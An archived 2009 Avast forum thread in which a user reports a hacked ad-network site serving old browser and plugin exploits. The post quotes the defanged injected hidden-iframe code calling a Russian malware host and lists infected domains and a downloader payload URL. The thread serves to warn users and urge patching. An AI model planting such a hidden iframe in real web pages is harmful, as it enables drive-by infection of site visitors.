Avast WEBforum

Other => General Topics => Topic started by: polonus on November 11, 2009, 08:47:09 PM

Title: Big Media site hacked to infect....
Post by: polonus on November 11, 2009, 08:47:09 PM

Hi malware fighters,

A large online adfirm website has been hacked and is being used to infect unaware visitors.. Media-servers.net is among the Top 900 most frequently visited Internet sites. Attackers mainly used old exploits that they hide on the website. Used were vulnerability holes for Microsoft DirectShow, Microsoft Snapshot Viewer, Microsoft Data Access Components (MDAC), AOL ConvertFile, Adobe Reader and Acrobat. The majority of these holes date from 2007 and 2008##. According to Websense that found the hack, the injected code forms part of a masive hack-campaign to put malcode unto legit websites:
http://securitylabs.websense.com/content/Alerts/3500.aspx

External References

- superkahn.ru suspicious ↗ - displaying 1 of 1
<IFrame> hidden link - hXtp://superkahn.ru:8080/index.php *

^iframe frameborder="0" onload="if (!this.src){ this.src='hXtp://superkahn.ru:8080/index.php'; ..^^this.height='0'; this.width='0';}" ^jykemwkucwwucrgacoggnconqcaqvfl^/iframe^
(code secured by me - avast detects this as "HTML:Illiframe-D [Trj]"

* Malicious software includes 7 trojans, 7 exploits.

This site was hosted on 8 network(s) including AS16276 (OVH), AS16265 (LEASEWEB), AS28753 (NETDIRECT).

Has this site been redirecting to spread malicious software?
It seems that superkahn.ru has been functioning during the last 90 days to spread infections of 4 sites, e.g. karunkoleji.k12.tr/, yaprakyapi.com.tr/, bodzashop.extra.hu/.

Has this site been hosting malware?
The malicious software infected 77 domains, e.g. art-vid.com/, nutrilox.com/, fabiamotorsport.com/.
Detected was
Name of threat:   Downloader.Fostrem
Location of this threat:    hxtp://superkahn.ru:8080/pics/win.jpg
Location of mentioned site: France,

polonus

## N.B. See how important it is to have your OS- and third party software fully upgraded and fully patched, so check with Secunia PSI - older software and you could be vulnerable...

D

Title: Re: Big Media site hacked to infect....
Post by: nmb on November 12, 2009, 01:13:14 PM

Thanks for the update sir pol.

I use hosts-file.net adservers list which includes mediaservers.net . so nothing to worry.

nmb